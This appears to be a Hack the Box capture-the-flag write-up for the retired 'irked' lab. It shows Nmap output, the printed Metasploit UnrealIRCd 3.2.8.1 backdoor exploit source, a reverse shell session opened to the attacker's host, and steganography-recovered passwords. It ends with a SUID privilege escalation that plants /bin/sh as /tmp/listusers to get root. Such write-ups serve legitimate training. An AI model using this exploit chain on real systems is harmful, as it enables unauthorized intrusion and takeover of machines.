Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is 10.10.10.117
Scanning
Let’s start off with our basic Nmap command to find out the open ports and services.
root@kali:~/htb# nmap -p- -sV 10.10.10.117 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-04 05:49 EDT Nmap scan report for 10.10.10.117 Host is up (0.027s latency). Not shown: 65427 closed ports, 101 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 34772/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds
It gave us a frustrated emoji when exploring port 80, as shown below, and some hints for irc are working. This image might have some hidden information, so I download this image and begin to penetrate it.
Enumeration
I tried to extract hidden information with the help of steghide, but we need to find the passphrase for that.
root@kali:~/htb# steghide extract -sf irked.jpg Enter passphrase:
Exploiting
Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.14.5:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jt9flkHuSYLifEoc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jt9flkHuSYLifEoc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.117:34526) at 2019-09-04 05:07:52 -0400
python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ cd /home
cd /home
ircd@irked:/home$
ircd@irked:/home$ ls
ls
djmardov ircd
ircd@irked:/home$
ircd@irked:/home$ cd djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
So, as you can see, we’ve got the victim’s machine command session,We found frustrated emoji in the beginning, requiring a passphrase to extract the hidden text behind the image. So, as a passphrase, I use the password above and found a pass.txt file from within irked.jpg.
root@kali:~/htb# curl http://10.10.10.117 <img src=irked.jpg> <br> <b><center>IRC is almost working!</b></center> root@kali:~/htb# curl http://10.10.10.117/irked.jpg -o irked.jpg % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k root@kali:~/htb# steghide extract -sf irked.jpg Enter passphrase: UPupDOWNdownLRlrBAbaSSss wrote extracted data to "pass.txt". root@kali:~/htb# cat pass.txt Kab6h+m+bbp2J:HG
I found another password from the inside pass.txt file “Kab6h+m+bbp2J: HG.”
Without Metasploit:
nmap also gave me the name of the irc server, UnrealIRCd. searchsploit shows there are exploits if the version is 3.2.8.1:
root@kali:~/htb# searchsploit UnrealIRCd ---------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ---------------------------------------------------------------- ---------------------------------------- UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl ---------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb Exploit: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) URL: https://www.exploit-db.com/exploits/16922/ Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb File Type: Ruby script, ASCII text, with CRLF line terminators Copied to: /root/htb/16922.rb
root@kali:~/htb# cat 16922.rb
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
'Description' => %q{
This module exploits a malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11227 $',
'References' =>
[
[ 'CVE', '2010-2075' ],
[ 'OSVDB', '65445' ],
[ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 12 2010'))
register_options(
[
Opt::RPORT(6667)
], self.class)
end
def exploit
connect
print_status("Connected to #{rhost}:#{rport}...")
banner = sock.get_once(-1, 30)
banner.to_s.split("\n").each do |line|
print_line(" #{line}")
end
print_status("Sending backdoor command...")
sock.put("AB;" + payload.encoded + "\n")
handler
disconnect
end
endroot@kali:~/htb#
It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.
Privilege Escalation
First, I open the user.txt file and finish the first challenge. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.Here /usr/bin/viewuser looks more interesting, let’s check it out.
root@kali:~/htb# ssh djmardov@10.10.10.117 djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Sep 4 05:13:43 2019 from 10.10.14.5 djmardov@irked:~$ pwd /home/djmardov djmardov@irked:~$ cat Documents/user.txt 4a66a78b12dc0e661a59d3f5c0267a8e djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/sbin/exim4 /usr/sbin/pppd /usr/bin/chsh /usr/bin/procmail /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/at /usr/bin/pkexec /usr/bin/X /usr/bin/passwd /usr/bin/chfn /usr/bin/viewuser /sbin/mount.nfs /bin/su /bin/mount /bin/fusermount /bin/ntfs-3g /bin/umount djmardov@irked:/$ ls -la /usr/bin/viewuser -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser djmardov@irked:/$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-09-04 05:05 (:0) djmardov pts/1 2019-09-04 05:13 (10.10.14.5) sh: 1: /tmp/listusers: not found djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers djmardov@irked:/$ chmod 777 /tmp/listusers djmardov@irked:/$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-09-04 05:05 (:0) djmardov pts/1 2019-09-04 05:13 (10.10.14.5) # id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth) # cd /root # ls pass.txt root.txt # cat root.txt 8d8*****af3
So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.
So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.
Now we have a root shell
Credits to hackingarticles.in
Author: Jacco Straathof